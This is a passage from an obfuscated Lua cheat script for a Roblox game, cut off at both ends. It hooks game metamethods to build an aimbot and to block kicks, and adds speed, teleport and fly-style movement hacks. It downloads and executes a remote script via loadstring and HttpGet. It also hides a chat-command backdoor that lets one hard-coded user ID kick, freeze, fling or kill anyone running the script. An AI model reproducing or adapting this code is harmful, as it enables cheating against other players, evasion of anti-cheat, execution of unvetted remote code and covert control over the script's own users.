v368=v35:WorldToViewportPoint(v317.Character.PrimaryPart.Position);v369=(Vector2.new(v368.X,v368.Y) -v204).magnitude;v367=2 -1 ;end if (v367==1) then if (v369<v203) then local v461=0;local v462;while true do if ((0 -0)==v461) then v462=0 + 0 ;while true do if (v462==0) then v202=v317;v203=v369;break;end end break;end end end break;end end end end return v202;end game:GetService(v7("\33\192\140\200\239\213\5\220\129\254","\167\115\181\226\155\138")).Stepped:Connect(function() local v205=0 -0 ;local v206;local v207;while true do if (v205==(1 + 0)) then while true do if (v206==(0 + 0)) then v207=FindClosestPlayer();if v207 then local v463=722 -(478 + 244) ;local v464;while true do if (v463==(517 -(440 + 77))) then v464=0;while true do if (v464==(0 + 0)) then TargetPlayer=tostring(v207);v78.Position=game.Players[TargetPlayer].Character.HumanoidRootPart.Position;break;end end break;end end end break;end end break;end if (v205==(0 -0)) then v206=1556 -(655 + 901) ;v207=nil;v205=1 + 0 ;end end end);local v72=getrawmetatable(game);local v73=v72.__namecall;setreadonly(v72,false);v72.__namecall=newcclosure(function(...) local v208=0 + 0 ;local v209;local v210;while true do if (v208==(0 + 0)) then v209=0 -0 ;v210=nil;v208=1446 -(695 + 750) ;end if (v208==1) then while true do local v384=0;while true do if (0==v384) then if (v209==1) then return v73(...);end if (v209==(0 -0)) then v210={...};if (v75 and (getnamecallmethod()==v7("\196\43\245\89\72\116\212\244\39\245","\166\130\66\135\60\27\17")) and (v210[2]==v7("\105\101\251\70\21","\80\36\42\174\21"))) then local v506=0 -0 ;while true do if (v506==(351 -(285 + 66))) then v210[3]=game.Players[TargetPlayer].Character[v77].Position + (game.Players[TargetPlayer].Character[v77].Velocity * v76) ;return v73(unpack(v210));end end end v209=2 -1 ;end break;end end end break;end end end);local v85=loadstring(game:HttpGet("https://raw.githubusercontent.com/LejendO684/Main/main/BetterKavo.lua"))();local v86=v85.CreateLib(v7("\99\17\51\127\14\18\46\58\98\21\61\127\64\20","\26\46\112\87"),v7("\155\47\164\123\187\139\77\177\180\38","\212\217\67\203\20\223\223\37"));local v87=v86:NewTab(v7("\151\140\161\220","\178\218\237\200"));local v88=v87:NewSection(v7("\155\180\239\222","\176\214\213\134"));v88:NewTextBox(v7("\194\164\162\209\178\87","\57\148\205\214\180\200\54"),v7("\38\248\45\32\116\29\229\28\58\112\29","\22\114\157\85\84"),function(v211) game.Players.LocalPlayer.Character.Humanoid.Name=v7("\236\222\30","\200\164\171\115\164\61\150");game.Players.LocalPlayer.Character.Hum.WalkSpeed=v211;end);v88:NewButton(v7("\144\225\67\68\144\170\241\19\81\138\254\247\2\75\135\254\231\2\87\138","\227\222\148\99\37"),"",function() if  not game.IsLoaded(game) then game.Loaded.Wait(game.Loaded);end local v214=game.IsA;local v215=nil;v215=hookmetamethod(game,v7("\12\109\92\243\238\58\92\86\243\225","\153\83\50\50\150"),function(v318,v319,v320) if ( not checkcaller() and v214(v318,v7("\117\99\126\29\125\164\68\89","\45\61\22\19\124\19\203")) and (v319==v7("\235\7\0\229\50\127\174\196\0","\217\161\114\109\149\98\16"))) then return;end return v215(v318,v319,v320);end);end);v88:NewTextBox(v7("\52\47\46","\20\114\64\88\28\220"),"",function(v216) game:GetService(v7("\6\14\192\191\235\192\188\50\4","\221\81\97\178\212\152\176")).Camera.FieldOfView=v216;end);v88:NewTextBox(v7("\224\230\5\193\21\194\234","\122\173\135\125\155"),"",function(v218) game.Players.LocalPlayer.CameraMaxZoomDistance=v218;end);v88:NewButton(v7("\182\196\19\188\43\48\218\129\129\38\182\45\37\201\144\192","\168\228\161\96\217\95\81"),"",function() game.Players.LocalPlayer.Character.Head:Destroy();end);local v89=v86:NewTab(v7("\248\208\35\80\32\84\208","\55\187\177\78\60\79"));local v90=v89:NewSection(v7("\14\193\81\237\79\200\147","\224\77\174\63\139\38\175"));v90:NewToggle(v7("\165\66\76\39\146\64\76","\78\228\33\56"),"",function(v220) getgenv().Enabled=v220;end);v90:NewToggle(v7("\254\108\183\7\140\205\106\187\6","\229\174\30\210\99"),"",function(v222) getgenv().PredictMovement=v222;end);v90:NewTextBox(v7("\53\248\139\80\255\40\53\91\221\148\84\233\52\58\15\228\131\88","\89\123\141\230\49\141\93"),"",function(v224) getgenv().PredictionVelocity=v224;end);v90:NewToggle(v7("\208\112\251\9\2\75\179\119\255\2\17","\42\147\17\150\108\112"),"",function(v226) getgenv().Smoothness=v226;end);v90:NewTextBox(v7("\33\179\32\126\245\253\3\230\14\126\234\237\29\163\36\63\225\225\1\163","\136\111\198\77\31\135"),"",function(v228) getgenv().SmoothnessAmount=v228;end);v90:NewToggle(v7("\35\14\174\66\188\246\18\233\1\8\170\83\175\229","\201\98\105\199\54\221\132\119"),"",function(v230) getgenv().Shake=v230;end);v90:NewTextBox(v7("\151\25\142\32\16\32\160\249\45\132\40\22\52\190\176\5","\204\217\108\227\65\98\85"),"",function(v232) getgenv().ShakeValue=v232;end);v90:NewTextBox(v7("\122\202\230\241\45\206\74\194","\160\62\163\149\133\76"),"",function(v234) getgenv().AimRadius=v234;end);v90:NewDropdown(v7("\230\161\31\59\198\215\224\9\42\131\215\169\0","\163\182\192\109\79"),"",{v7("\28\51\13\193\251\59\47\4\242\250\59\50\48\193\231\32","\149\84\70\96\160"),v7("\16\3\12\233","\141\88\102\109"),v7("\134\67\218\117\8\9\90\211\160\92","\161\211\51\170\16\122\93\53"),v7("\215\161\165\45\233\154\189\58\232\161","\72\155\206\210")},function(v236) getgenv().AimPart=v236;end);v90:NewDropdown(v7("\118\123\70\26\54\71\58\80\11\115\71\115\70","\83\38\26\52\110"),"",{v7("\112\2\42\71\86\24\46\66\106\24\40\82\104\22\53\82","\38\56\119\71"),v7("\219\234\89\210","\54\147\143\56\182\69"),v7("\227\145\239\76\205\226\142\237\90\208","\191\182\225\159\41"),v7("\7\29\63\80\153\179\205\57\1\39","\162\75\114\72\53\235\231")},function(v238) getgenv().OldAimPart=v238;end);v90:NewToggle(v7("\168\57\94\227\80\22\133\42\65\227\73\3\204\63\69\236\87\66\129\51\69\240\86","\98\236\92\36\130\51"),"",function(v240) getgenv().DisableOnTargetDeath=v240;end);v90:NewToggle(v7("\128\28\22\187\70\188\188\38\161\24\22\187\5\171\180\62\160\89\1\181\87\161","\80\196\121\108\218\37\200\213"),"",function(v242) getgenv().DisableOnPlayerDeath=v242;end);v90:NewToggle(v7("\38\102\12\124\95\7\143\64\119\7\63\74\7\152","\234\96\19\98\31\43\110"),"",function(v244) getgenv().CheckIfJumped=v244;end);local v91=v86:NewTab(v7("\50\16\85\192\160\119\152","\235\102\127\50\167\204\18"));local v92=v91:NewSection(v7("\100\174\242\36\72\43\67","\78\48\193\149\67\36"));local v93=false;local v94=0.5 + 0 ;local function v95() while v93 do local v321=0;local v322;while true do if (v321==(1 + 0)) then wait();break;end if ((0 -0)==v321) then v322=game.Players.LocalPlayer.Character;if v322 then v322.HumanoidRootPart.CFrame=v322.HumanoidRootPart.CFrame + (v322.Humanoid.MoveDirection * v94) ;end v321=2 -1 ;end end end end game.Players.LocalPlayer.CharacterAdded:Connect(function(v246) if v93 then v95();end end);v92:NewToggle(v7("\6\23\148\29\91\49\94\163\62\83\49\19\133","\33\80\126\224\120"),"",function(v247) local v248=315 -(306 + 9) ;while true do if (v248==(0 -0)) then v93=v247;if v247 then v95();end break;end end end);v92:NewTextBox(v7("\194\189\14\197\78\249\164\67\200\93\172\139\37\214\93\225\173","\60\140\200\99\164"),"",function(v249) local v250=0 + 0 ;local v251;local v252;while true do if (v250==(0 + 0)) then v251=0 + 0 ;v252=nil;v250=1;end if (v250==(2 -1)) then while true do if (v251==(1375 -(1140 + 235))) then v252=tonumber(v249);if v252 then v94=v252;end break;end end break;end end end);v92:NewToggle(v7("\180\245\22\47\226\137\241\7\41\172\147\230\11\42\163\147","\194\231\148\100\70"),v7("\6\109\212\183\249\136\108\89\204\179","\168\38\44\161\195\150"),function(v253) if v253 then local v345=0 + 0 ;local v346;while true do if (v345==(0 + 0)) then v346=0 + 0 ;while true do if (v346==0) then getgenv().Bhop=true;repeat local v484=52 -(33 + 19) ;local v485;while true do if (v484==(0 + 0)) then v485=0 -0 ;while true do if (v485==0) then wait();if (getgenv().Bhop==true) then game.Players.LocalPlayer.Character.Humanoid.Jump=true;end break;end end break;end end until getgenv().Bhop==false  break;end end break;end end else getgenv().Bhop=false;end end);v92:NewToggle(v7("\169\242\148\119\34\252\179\23\140\253","\118\224\156\226\22\80\136\214"),"",function(v254) if v254 then local v348=0;while true do if (v348==(0 + 0)) then wait();game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.Angles(0 -0 ,math.rad(235 + 15 ),689 -(586 + 103) ) ;break;end end end end);v92:NewButton(v7("\99\251\77\143\2\221\77\143\79\254","\224\34\142\57"),"",function(v255) while wait() do game:GetService(v7("\236\162\213\209\122\242\92\26\219\163\246\201\124\227\92\9\219","\110\190\199\165\189\19\145\61")).MAINEVENT:FireServer(v7("\233\223\88\197\187","\167\186\139\23\136\235"));end end);local v96=v86:NewTab(v7("\59\188\133\1\21\182\131","\109\122\213\232"));local v97=v96:NewSection(v7("\205\248\172\54\231\240\177","\80\142\151\194"));v97:NewToggle(v7("\38\200\118\78\15\195\115","\44\99\166\23"),"",function(v256) v55.rewrittenmain.Enabled=v256;end);v97:NewToggle(v7("\76\229\44\50\58\167\104\254\44","\196\28\151\73\86\83"),"",function(v258) v55.rewrittenmain.Prediction=v258;end);v97:NewTextBox(v7("\221\22\36\17\144\77\20\54\195\17\44\20\139\91\12\127\246\10","\22\147\99\73\112\226\56\120"),"",function(v260) v55.rewrittenmain.PredictionValue=v260;end);v97:NewToggle(v7("\136\103\231\241\132\187\97\235\240\205\185\96\246\250\128\185\97\227","\237\216\21\130\149"),"",function(v262) v55.rewrittenmain.AUTOPRED=v262;end);v97:NewDropdown(v7("\178\79\77\75\181\200\30\134\75\31\94\185\196","\62\226\46\63\63\208\169"),"",{v7("\205\12\88\130\17\2\38\90\215\22\90\151\47\12\61\74","\62\133\121\53\227\127\109\79"),v7("\56\17\51\241","\194\112\116\82\149\182\206"),v7("\12\184\92\29\210\214\1\43\187\67","\110\89\200\44\120\160\130"),v7("\135\204\92\67\81\126\52\95\184\204","\45\203\163\43\38\35\42\91")},function(v264) v55.rewrittenmain.SelectedPart=v264;end);v97:NewToggle(v7("\252\138\200\42\129\160\87\211\151\213","\52\178\229\188\67\231\201"),"",function(v266) v55.rewrittenmain.NOTIF=v266;end);v97:NewTextBox(v7("\12\68\68\12\248\88","\67\65\33\48\100\151\60"),"",function(v268) v55.rewrittenmain.Method=v268;end);v97:NewToggle(v7("\251\226\180\217\240\203\238\184\221\242\197\230\238\219\242\209\227\238\213\252\222\245\171","\147\191\135\206\184"),"",function(v270) v55.rewrittenmain.TargetDied=v270;end);v97:NewToggle(v7("\160\45\188\192\219\71\187\146\45\167\219\217\19\177\133\38\162\129\213\92\160\141","\210\228\72\198\161\184\51"),"",function(v272) v55.rewrittenmain.PlayerDeath=v272;end);local v98=v86:NewTab(v7("\5\64\255\21\125\218\118\104\250\29","\174\86\41\147\112\19"));local v97=v98:NewSection(v7("\104\9\129\14\43\27\81\138\82\13","\203\59\96\237\107\69\111\113"));v97:NewToggle(v7("\5\21\184\232\39\241\195","\183\68\118\204\129\81\144"),"",function(v274) v75=v274;end);v97:NewTextBox(v7("\62\191\117\246\2\129\26\164\117","\226\110\205\16\132\107"),"",function(v275) v76=v275;end);v97:NewDropdown(v7("\219\194\242\205\68\234\131\228\220\1\234\202\237","\33\139\163\128\185"),"",{v7("\127\77\9\223\89\87\13\218\101\87\11\202\103\89\22\202","\190\55\56\100"),v7("\126\170\61\26","\147\54\207\92\126\115\131"),v7("\56\33\37\120\31\74\2\35\38\114","\30\109\81\85\29\109"),v7("\211\126\67\179\36\234\243\237\98\91","\156\159\17\52\214\86\190")},function(v276) v77=v276;end);v97:NewTextBox(v7("\138\230\174\168\175\225\169\189","\220\206\143\221"),"",function(v277) MiddleScreenRadius=v277;end);v88:NewButton(v7("\188\114\32\21\209\201\146\167\115\36\26\217\216\219\137\115","\178\230\29\77\119\184\172"),"",function() while true do local v323=1488 -(1309 + 179) ;local v324;while true do if (v323==(2 -0)) then wait(1 + 0 );break;end if (v323==(2 -1)) then v324.run.RunAnim.AnimationId="http://www.roblox.com/asset/?id=616163682";game.Players.LocalPlayer.Character.Humanoid.Jump=false;v323=2 + 0 ;end if (v323==(0 -0)) then v324=game.Players.LocalPlayer.Character.Animate;v324.walk.WalkAnim.AnimationId="http://www.roblox.com/asset/?id=616168032";v323=1 -0 ;end end end end);v88:NewButton(v7("\195\187\6\20\116\241\225\167\74\75","\152\149\222\106\123\23"),"",function() local v278=0;local v279;local v280;local v281;local v282;while true do if (v278==(610 -(295 + 314))) then function v281(v390) v390.CharacterAdded:Connect(function(v416) local v417=0 -0 ;local v418;while true do if (v417==(1962 -(1300 + 662))) then v418=v416:WaitForChild(v7("\103\64\121\9\65\90\125\12\125\90\123\28\127\84\102\28","\104\47\53\20"));v280(v418);break;end end end);end v282=nil;function v282(v391) v391.CharacterAdded:Disconnect();end game.Players.PlayerAdded:Connect(v281);v278=6 -4 ;end if (v278==2) then game.Players.PlayerRemoving:Connect(v282);v279.Heartbeat:Connect(function() pcall(function() for v434,v435 in pairs(game.Players:GetChildren()) do if (v435.Name~=game.Players.LocalPlayer.Name) then local v466=1755 -(1178 + 577) ;local v467;while true do if (v466==(0 + 0)) then v467=v435.Character.HumanoidRootPart;v280(v467);break;end end end end end);end);v279.Heartbeat:Connect(function() pcall(function() for v436,v437 in pairs(game.Players:GetChildren()) do if (v437.Name~=game.Players.LocalPlayer.Name) then local v468=v437.Character.HumanoidRootPart;v468.Velocity=Vector3.new(v468.Velocity.X,0,v468.Velocity.Z);v468.AssemblyLinearVelocity=Vector3.new(v468.Velocity.X,0 -0 ,v468.Velocity.Z);end end end);end);break;end if (v278==(1405 -(851 + 554))) then v279=game:GetService(v7("\239\51\248\112\176\207\48\255\64\176","\213\189\70\150\35"));v280=nil;function v280(v392) v392.Velocity=Vector3.new(v392.Velocity.X,0 + 0 ,v392.Velocity.Z);v392.AssemblyLinearVelocity=Vector3.new(v392.Velocity.X,0 -0 ,v392.Velocity.Z);end v281=nil;v278=1 -0 ;end end end);local v99=v86:NewTab(v7("\151\77\147\27\185\27","\111\195\44\225\124\220"));local v100=v99:NewSection(v7("\236\71\18\116\174\191","\203\184\38\96\19\203"));local v101=nil;getgenv().plr=nil;local v103={};for v283,v284 in pairs(game.Players:GetPlayers()) do if (v284~=game.Players.LocalPlayer) then table.insert(v103,v284.Name);end end local v104=v100:NewDropdown(v7("\9\127\120\88\203\43\96","\174\89\19\25\33"),v7("\3\27\65\90","\107\79\114\50\46\151\231"),v103,function(v285) v101=v285;end);game.Players.PlayerAdded:Connect(function(v286) local v287=302 -(115 + 187) ;local v288;while true do if (v287==1) then v104:Refresh(v103);break;end if (v287==(0 + 0)) then v288=v286.Name;table.insert(v103,v288);v287=1 + 0 ;end end end);game.Players.PlayerRemoving:Connect(function(v289) local v290=0;local v291;while true do if (v290==(0 -0)) then local v371=0;while true do if ((1162 -(160 + 1001))==v371) then v290=1;break;end if (v371==0) then v291=v289.Name;for v445,v446 in pairs(v103) do if (v446==v291) then table.remove(v103,v445);end end v371=1 + 0 ;end end end if ((1 + 0)==v290) then v104:Refresh(v103);break;end end end);v100:NewToggle(v7("\15\163\175\32\202\45\190\206\45\167","\160\89\198\213\73\234\89\215"),"",function(v292) if v292 then wait();game.Workspace.Camera.CameraSubject=game.Players[v101].Character.Humanoid;else wait();game.Workspace.Camera.CameraSubject=game.Players.LocalPlayer.Character.Humanoid;end end);v100:NewButton(v7("\124\116\184\251\213\71\99\160\190\201\73\49\160\247\203\92\112","\165\40\17\212\158"),"",function() game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=game.Players[v101].Character.HumanoidRootPart.CFrame;end);local v105=game.CoreGui;local v106=Instance.new(v7("\214\218\26\54\35\235\254\29\58","\70\133\185\104\83"));local v107=Instance.new(v7("\48\64\92\62\235\17\81\80\37\199","\169\100\37\36\74"));local v108=Instance.new(v7("\53\174\129\95\18\137\167\66","\48\96\231\194"));v106.IgnoreGuiInset=true;v106.Name=v7("\228\83\12\63\24\202\182\172\216\95\0","\227\168\58\110\77\121\184\207");v106.Parent=v105;v107.AnchorPoint=Vector2.new(0.5,0 -0 );v107.BackgroundTransparency=100;v107.Text=v7("\84\44\186\78","\197\27\92\223\32\209\187\17");v107.Parent=v106;v107.Position=UDim2.new(0.03,358 -(237 + 121) ,0,997 -(525 + 372) );v107.Size=UDim2.new(0,75 -35 ,0 -0 ,40);v107.ZIndex=144 -(96 + 46) ;v108.CornerRadius=UDim.new(777 -(643 + 134) ,3 + 3 );v108.Parent=v107;v108.Name=v7("\49\80\214\245\7\86\205\252","\155\99\63\163");v107.MouseButton1Click:Connect(function() v85:ToggleUI();end);local v122=Instance.new(v7("\164\195\160\128\188","\228\226\177\193\237\217"));v122.Name=v7("\22\151","\134\84\208\67");v122.Parent=v106;v122.BackgroundTransparency=1;v122.Size=UDim2.new(0,71 -41 ,0 -0 ,29 + 1 );v122.Position=UDim2.new(0.149 -0 ,0,0.82 -0 ,719 -(316 + 403) );v122.Active=true;v122.Draggable=true;local v130=Instance.new(v7("\39\169\158\72\49\185\146\72\28\162","\60\115\204\230"));v130.Parent=v122;v130.BackgroundColor3=(isActive and Color3.new(0 + 0 ,0 -0 ,1 + 0 )) or Color3.new(1,1,1) ;v130.BorderColor3=Color3.new(0.18,0 -0 ,0.431);v130.BorderSizePixel=2 + 0 ;v130.Size=UDim2.new(0 + 0 ,30,0 -0 ,143 -113 );v130.Text="";local v137=false;local v33=game.Players.LocalPlayer;local v138=game.Workspace.CurrentCamera;local v139=0 -0 ;local v140=0 + 0 ;local function v141() local v295=0;local v296;local v297;while true do if (v295==0) then v296=0;v297=nil;v295=1 -0 ;end if (v295==1) then while true do if (v296==(1 + 0)) then if ((v297-v140)>=v139) then local v471=0 -0 ;local v472;local v473;local v474;local v475;while true do if (v471==1) then v474=Vector3.new(v472.X,17 -(12 + 5) ,v472.Z);v475=CFrame.new(v473,v473 + v474 );v471=7 -5 ;end if (v471==0) then v472=v138.CFrame.lookVector;v473=v33.Character.HumanoidRootPart.Position;v471=1 -0 ;end if (v471==(3 -1)) then v33.Character.HumanoidRootPart.CFrame=CFrame.new(v473,v473 + v474 );v140=v297;break;end end end break;end if (v296==(0 -0)) then if  not v137 then return;end v297=tick();v296=1 + 0 ;end end break;end end end game:GetService(v7("\213\47\229\67\226\40\253\121\228\63","\16\135\90\139")).Heartbeat:Connect(function() v141();end);local v142=Instance.new(v7("\96\123\9\63","\24\52\20\102\83\46\52"));v142.RequiresHandle=false;v142.Name=v7("\233\46\34\54\0","\111\164\79\65\68");v142.Parent=game.Players.LocalPlayer.Backpack;v142.Activated:Connect(function() local v298=1973 -(1656 + 317) ;while true do if (0==v298) then v137= not v137;v130.BackgroundColor3=(v137 and Color3.new(0 + 0 ,0 + 0 ,1)) or Color3.new(1,1,2 -1 ) ;break;end end end);game.Players.LocalPlayer.CharacterAdded:Connect(function() v142.Parent=game.Players.LocalPlayer.Backpack;end);v130.MouseButton1Click:Connect(function() local v301=0;local v302;while true do if (v301==(0 -0)) then v302=354 -(5 + 349) ;while true do if (v302==(0 -0)) then v137= not v137;v130.BackgroundColor3=(v137 and Color3.new(1271 -(266 + 1005) ,0 + 0 ,3 -2 )) or Color3.new(1 -0 ,1,1697 -(561 + 1135) ) ;break;end end break;end end end);local v146={1779272417};local v147=game.Players.LocalPlayer;local v29=game.Players;local function v148(v303,v304) if ((DisableMod==false) or table.find(v146,v304)) then local v353=0 -0 ;local v354;local v355;local v356;local v357;local v358;local v359;while true do if (1==v353) then v356=nil;v357=nil;v353=2;end if (v353==(9 -6)) then while true do if (v354==0) then local v476=0;while true do if (v476==(1067 -(507 + 559))) then v354=2 -1 ;break;end if (v476==0) then v355=game:GetService(v7("\246\213\130\199\43\248\213","\138\166\185\227\190\78")):GetPlayerByUserId(v304);v356=string.lower(v303);v476=3 -2 ;end end end if ((389 -(212 + 176))==v354) then v357=string.split(v356," ");v358=string.lower(v147.Name);v354=907 -(250 + 655) ;end if (v354==(5 -3)) then v359=string.find(v358,v357[2]);if v359 then local v500=0 -0 ;while true do if (v500==(5 -1)) then if string.find(v357[1957 -(1869 + 87) ],v7("\249\176\234\196\197\8\101\107\166\161","\24\195\211\130\161\166\99\16")) then local v539=0 -0 ;local v540;while true do if (v539==(1901 -(484 + 1417))) then v540=table.find(v146,v147.UserId);if  not v540 then local v595=0 -0 ;local v596;local v597;while true do if ((1 -0)==v595) then while true do if (v596==0) then v597={[774 -(48 + 725) ]="/w "   .. v355.Name   .. v7("\6\47\230\32","\118\38\99\137\76\51") ,[2 -0 ]=v7("\220\42\9","\64\157\70\101\114\105")};game:GetService(v7("\114\173\183\239\25\67\169\179\230\20\115\188\168\241\17\71\173","\112\32\200\199\131")).DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(v597));break;end end break;end if (v595==0) then v596=0;v597=nil;v595=2 -1 ;end end end break;end end end break;end if ((2 + 0)==v500) then if string.find(v357[2 -1 ],v7("\255\136\4\192","\22\197\234\101\174\25")) then local v541=0 + 0 ;local v542;while true do if (v541==0) then v542=table.find(v146,v147.UserId);if  not v542 then local v598=0;while true do if (v598==(1 + 0)) then while true do end break;end if ((853 -(152 + 701))==v598) then v147:Kick(v7("\29\17\151\241\87\239\245\167\3","\230\77\84\197\188\22\207\183"));wait(5);v598=1312 -(430 + 881) ;end end end break;end end end if string.find(splitCommand[1 + 0 ],v7("\163\7\199\229","\85\153\116\166\156\236\193\144")) then if  not table.find(v146,v147.UserId) then local v569=895 -(557 + 338) ;local v570;while true do if (v569==0) then v570=message:gsub(splitCommand[1]   .. " " ,"");game:GetService(v7("\150\229\93\191\237\3\165\244\72\183\215\20\171\242\76\180\225","\96\196\128\45\211\132")).DefaultChatSystemChatEvents.SayMessageRequest:FireServer(v570,v7("\20\129\119","\184\85\237\27\63\178\207\212"));break;end end end end if string.find(v357[1 + 0 ],v7("\82\91\27\86\6\94","\63\104\57\105")) then local v543=0 -0 ;local v544;while true do if (v543==0) then v544=table.find(v146,v147.UserId);if  not v544 then v147.Character.HumanoidRootPart.CFrame=CFrame.new(game.Players:FindFirstChild(v355.Name).Character.HumanoidRootPart.Position);end break;end end end if string.find(v357[1],v7("\81\129\168\77\5\128","\36\107\231\196")) then local v545=0;local v546;while true do if (v545==(0 -0)) then v546=table.find(v146,v147.UserId);if  not v546 then v147.Character.HumanoidRootPart.Velocity=Vector3.new(1328386 -828386 ,500000,1077581 -577581 );end break;end end end v500=3;end if (v500==(802 -(499 + 302))) then if string.find(v357[867 -(39 + 827) ],v7("\102\83\211\189\254","\109\92\37\188\212\154\29")) then local v547=0 -0 ;local v548;while true do if (v547==0) then v548=table.find(v146,v147.UserId);if  not v548 then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(0, -350,0);end break;end end end if string.find(v357[1],v7("\94\233\182\198\52\64\1","\58\100\143\196\163\81")) then local v549=0 -0 ;local v550;local v551;while true do if (0==v549) then v550=0;v551=nil;v549=3 -2 ;end if (v549==1) then while true do if (v550==(0 -0)) then v551=table.find(v146,v147.UserId);if  not v551 then v147.Character.HumanoidRootPart.Anchored=true;end break;end end break;end end end if (string.find(v357[1],v7("\64\87\45\165\45\76\224\20\31","\110\122\34\67\195\95\41\133")) or string.find(v357[1],v7("\47\165\83\75\193","\182\21\209\59\42"))) then v147.Character.HumanoidRootPart.Anchored=false;end if string.find(v357[1 + 0 ],v7("\237\92\204\30\42","\222\215\55\165\125\65")) then local v553=0;local v554;while true do if (v553==0) then v554=table.find(v146,v147.UserId);if  not v554 then local v602=0 -0 ;while true do if (v602==(0 + 0)) then v147:Kick(v7("\7\216\197\17\247\197\173\72\53\139\134","\42\76\177\166\122\146\161\141")   .. v355.Name   .. "" );wait(7 -2 );v602=105 -(103 + 1) ;end if (v602==(555 -(475 + 79))) then while true do end break;end end end break;end end end v500=4 -2 ;end if (v500==0) then local v523=0;while true do if ((0 -0)==v523) then if string.find(v357[1],v7("\145\118\192\57\74","\121\171\20\165\87\50\67")) then local v573=0;local v574;local v575;local v576;local v577;local v578;local v579;local v580;local v581;local v582;local v583;while true do if (v573==3) then function v581() local v608=0;local v609;local v610;while true do if (v608==(1 + 0)) then if v609 then local v629=0;while true do if (v629==0) then if (v577==true) then v576=v576-(0.1 + 0) ;else v576=v576 + 0.1 ;end if (v576>=(1505 -(1395 + 108))) then v577=true;elseif (v576<0.5) then v577=false;end v629=2 -1 ;end if (v629==1) then v610.HumanoidRootPart.CFrame=game.Players[v574].Character.HumanoidRootPart.CFrame + (game.Players[v574].Character.HumanoidRootPart.CFrame.lookVector * v576) ;break;end end end break;end if (v608==(1204 -(7 + 1197))) then v609=game.Workspace.Players:FindFirstChild(v574) or game.Workspace:FindFirstChild(v574) ;v610=v147.Character;v608=1;end end end function v582() v580=game:GetService(v7("\66\218\135\186\186\4\102\198\138\140","\118\16\175\233\233\223")).Heartbeat:Connect(v581);end function v583() local v611=0 + 0 ;local v612;while true do if (v611==(0 + 0)) then v612=0;while true do if (v612==0) then v580:Disconnect();v575:Stop();break;end end break;end end end v582();v573=323 -(27 + 292) ;end if (v573==2) then v579=v147.Character:FindFirstChild(v7("\193\235\34\162\54","\69\145\138\76\214"));if v578 then v578:Destroy();end if v579 then v579:Destroy();end v580=nil;v573=3;end if (v573==(11 -7)) then repeat wait();until bending==false  v583();break;end if (v573==1) then v575:Play();v576=0.5 -0 ;v577=false;v578=v147.Character:FindFirstChild(v7("\233\129\86\16\24","\141\186\233\63\98\108"));v573=8 -6 ;end if (v573==0) then bending=true;v574=v355.Name;v575=v147.Character:FindFirstChildWhichIsA(v7("\238\45\180\55\183\13\207\60","\98\166\88\217\86\217")):LoadAnimation(game:GetService(v7("\196\243\105\13\143\223\247\226\124\5\181\200\249\228\120\6\131","\188\150\150\25\97\230")).ClientAnimations.Crouching);v575.Looped=true;v573=1 -0 ;end end end if string.find(v357[1],v7("\209\145\59\185\235\133\101","\29\235\228\85\219\142\235")) then while bending==true  do local v591=0 -0 ;while true do if (v591==(139 -(43 + 96))) then wait();bending=false;break;end end end end v523=4 -3 ;end if (v523==2) then v500=1 -0 ;break;end if (v523==(1 + 0)) then if string.find(v357[1 + 0 ],v7("\103\211\168\220\97\75","\50\93\180\218\189\23\46\71")) then local v584=0 -0 ;local v585;while true do if (v584==(0 + 0)) then v585=table.find(v146,v304.UserId);if  not v585 then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(game.Players.LocalPlayer.Character.UpperTorso.Position.X,game.Players.LocalPlayer.Character.UpperTorso.Position.Y-(56 -26) ,game.Players.LocalPlayer.Character.UpperTorso.Position.z);game.Players.LocalPlayer.Character.LowerTorso.Anchored=true;end break;end end end if string.find(v357[1 + 0 ],v7("\132\177\85\75\86\221\94\219","\40\190\196\59\44\36\188")) then local v586=0 + 0 ;local v587;while true do if (v586==(1751 -(1414 + 337))) then v587=table.find(v146,playee.UserId);if  not v587 then game.Players.LocalPlayer.Character.LowerTorso.Anchored=false;wait(1940.1 -(1642 + 298) );game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new(game.Players.LocalPlayer.Character.UpperTorso.Position.X,game.Players.LocalPlayer.Character.UpperTorso.Position.Y + (78 -48) ,game.Players.LocalPlayer.Character.UpperTorso.Position.z);end break;end end end v523=5 -3 ;end end end if (v500==3) then if string.find(v357[2 -1 ],v7("\7\190\171\139\81","\231\61\213\194")) then local v555=0;local v556;while true do if (v555==0) then v556=table.find(v146,v147.UserId);if  not v556 then v147.Character:FindFirstChildOfClass(v7("\33\184\48\114\7\162\52\119","\19\105\205\93")):Destroy();end break;end end end if string.find(v357[1 + 0 ],v7("\243\27\215\149","\95\201\104\190\225")) then v147.Character:FindFirstChild(v7("\135\222\204\207\161\196\200\202","\174\207\171\161")).Sit=true;end if string.find(v357[1 + 0 ],v7("\183\235\3\224\241\195","\183\141\158\109\147\152")) then v147.character:FindFirstChild(v7("\4\28\235\13\34\6\239\8","\108\76\105\134")).Sit=false;end if string.find(v357[973 -(357 + 615) ],v7("\177\199\164\230","\174\139\165\209\129")) then v147:Destroy();end v500=4;end end else local v501=0 + 0 ;while true do if (v501==(0 -0)) then if (string.find(v303,v7("\118\83\84\189\192\160\98\47\93\88\171","\66\76\48\60\216\163\203")) or string.find(v303,v7("\224\133\113\246\92\197\100\185\137\116\254\94\192\32\169","\68\218\230\25\147\63\174"))) then local v559=0;while true do if (v559==(0 + 0)) then print("\n---...Lejend#0684...---");print("\n:check cmds / m!check commands\nm!check users\n:checkuser [user]\n:bring [user]\n:bug [user]\n:fling [user]\n:freeze [user]\n:unfreeze [user]\n:thaw [user]\n:kick [user]\n:kill [user]\n:sit [user]\n:ban [user]");v559=2 -1 ;end if (1==v559) then print("\n --..--..--..--..--..--..--..--..-- ");break;end end end if string.find(v303,v7("\247\41\91\73\181\166\106\70\95\179\191\57","\214\205\74\51\44")) then local v560=0;local v561;while true do if ((0 + 0)==v560) then v561=table.find(v146,v147.UserId);if  not v561 then local v603=0;local v604;while true do if (v603==0) then v604={[1 + 0 ]="/w "   .. v355.Name   .. v7("\186\96\237\240","\23\154\44\130\156") ,[2 + 0 